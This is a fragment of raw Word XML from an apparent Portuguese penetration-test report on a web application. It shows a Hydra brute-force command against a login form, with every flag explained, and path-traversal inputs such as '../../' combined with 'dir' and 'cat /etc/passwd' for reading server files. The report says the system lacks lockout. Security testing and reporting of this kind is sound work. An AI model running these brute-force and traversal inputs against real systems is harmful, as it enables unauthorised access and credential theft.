          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pam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, com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Captcha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que impeça a ferramenta automatizada de prosseguir até o fim do teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A6729" w:rsidRPr="00F15F82" w:rsidRDefault="000A6729" w:rsidP="00AC10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62442F" w:rsidRDefault="0062442F" w:rsidP="00AC10DC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707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Comando utilizado:</w:t>
      </w:r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hydra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l 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admin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P </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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forcaBruta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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http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-post-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form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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD5893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=false” -V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AC10DC" w:rsidP="00AC10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No comando acima:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED180C" w:rsidRPr="007260B8" w:rsidRDefault="00ED180C" w:rsidP="006304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7260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">” executa a ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="006304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 xml:space="preserve">“-l” significa o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007260B8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7260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado no momento. Nesse caso, deve ser sempre “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007260B8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r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">”, pois foi o único usuário válido fornecido para a realização de testes no </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado</w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="006304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 xml:space="preserve">“-P” aponta para o arquivo contendo as senhas que a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007260B8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7260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tentará utilizar para acessar o sistema;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="006304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 w:rsidRPr="007260B8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7260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” é o IP onde está hospedada a aplicação alvo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00DD5893" w:rsidP="006304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http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>-post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or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” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>informa</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o método utilizado </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>para fazer a requisição ao servidor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AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>do protocolo</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC10DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00265100" w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="006304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i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000C72B3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7260B8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7260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login.php:login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=^USER^:senha=^PASS^:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007260B8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r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=false”  </w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é a URL utilizada para fazer a requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="326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 xml:space="preserve">USER é onde a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007260B8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7260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> deve inserir o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> válido usado na requisição;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265100" w:rsidRPr="007260B8" w:rsidRDefault="00265100" w:rsidP="00630433">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="326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 xml:space="preserve">PASS é onde a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007260B8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Pr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> deve inserir a </w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>senha</w:t>
      </w:r>
      <w:r w:rsidRPr="007260B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> válida usada na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="007260B8" w:rsidRDefault="008C6DC7" w:rsidP="00630433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60B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“-V” é para exibir no console o resultado da opera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C10DC" w:rsidRDefault="005967D5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76417A" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C" w:rsidP="00AC10DC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>O sistema não p</w:t>
      </w:r>
      <w:r w:rsidR="00D76012" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>assou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00456110" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conforme mostra a figura 1, todas as tentativas configuradas na </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> foram executadas com sucesso.</w:t>
      </w:r>
      <w:r w:rsidR="00456110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FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O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sistema é vulnerável ao acesso via força</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69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FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">bruta, pois permite que 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>várias requisições sejam feitas ao servidor por tempo</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69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>indeterminado. Como não há mecanismo de bloqueio para</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69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FA1088">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>inúmeras requisições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>, o sistema abre uma brecha para</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69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>que senhas de acesso ao sistema possam ser descobertas após</w:t>
      </w:r>
      <w:r w:rsidR="00C86D69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76417A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>várias tentativas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456110" w:rsidRPr="00F15F82" w:rsidRDefault="00456110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654D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3A9FEF5" wp14:editId="3BA6EEAC">
            <wp:extent cx="5400040" cy="38201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                                           Figura 1 - Resultado da operação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A089C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E650F5" w:rsidP="00E650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3.1.2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. Tela </w:t>
      </w:r>
      <w:proofErr w:type="spell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Path Transversal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entre os dias 31/03/16 e 01/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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: 2 horas e 30 minutos. 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1557D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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ara identificar a estrutura de diretório</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s do sistema dentro do servidor, f</w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oi utilizada</w:t>
      </w:r>
      <w:r w:rsidR="0045732E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="0045732E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">funcionalidade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E158B8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E158B8" w:rsidRPr="00F15F82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="00E158B8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Spider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E158B8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32E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00ED7438"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438" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, ambas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">abordadas no subcapítulo 3.2. </w:t>
      </w:r>
      <w:r w:rsidR="00ED7438" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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Os resultados obtidos, conforme mostra a figura 2, foram utilizados para executar os testes deste tópico.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A7473" w:rsidRPr="00F15F82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A7473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FCCEF39" wp14:editId="34022809">
            <wp:extent cx="2507141" cy="31718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(Editada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4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1F" w:rsidRPr="00F15F82" w:rsidRDefault="00623C1F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>Figura 2 - Resultado mapeamento diretórios do sistema</w:t>
      </w:r>
      <w:r w:rsidR="002D436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BD33F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bjetivo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00846A20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Dada a estrutura hierárquica do sistema descrita na figura </w:t>
      </w:r>
      <w:r w:rsidR="00BE4C3F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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, o objetivo do teste é utilizar entradas maliciosas na URL para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conseguir acesso a loca</w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is não autorizados a um usuário</w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do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sistema.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D4365" w:rsidRDefault="002D4365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48383A" w:rsidP="00284BB3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F15F82" w:rsidRDefault="008C6DC7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Quando o sistema não consegue efetuar um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, o seguinte parâmetro é exibido na url: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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F15F8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false.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00B959F5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 primeira </w:t>
      </w:r>
      <w:r w:rsidR="00623C1F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s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é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fazer uma requisição ao servidor alterando a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citada anteriormente para: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365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proofErr w:type="gram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=../../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dir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="008C6DC7"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="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DF0646" w:rsidRPr="00F15F82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827015" w:rsidRDefault="00827015" w:rsidP="00827015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F15F82" w:rsidRDefault="00284BB3" w:rsidP="0063043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O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comando “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00284BB3" w:rsidP="0063043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O comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00827015">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00827015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no</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="0082701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6DC7" w:rsidRPr="00827015">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00827015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  <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidR="00BA7CEE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistema operacional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Windows</w:t>
      </w:r>
      <w:r w:rsidR="00827015">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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serve para listar os arquivos e diretórios dentro da pasta atual.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00827015" w:rsidRPr="00F15F82" w:rsidRDefault="00827015" w:rsidP="00827015">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1417"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00827015" w:rsidRPr="00827015" w:rsidRDefault="00827015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27015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284BB3" w:rsidRDefault="00827015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84BB3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27015" w:rsidRPr="00F15F82" w:rsidRDefault="00827015" w:rsidP="00827015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27015" w:rsidRDefault="005967D5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B959F5" w:rsidRPr="00F15F82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84BB3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84BB3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707"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 ../..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cat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etc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passwd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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="0063043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O comand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gramEnd"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="0063043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comando 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cat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/</w:t>
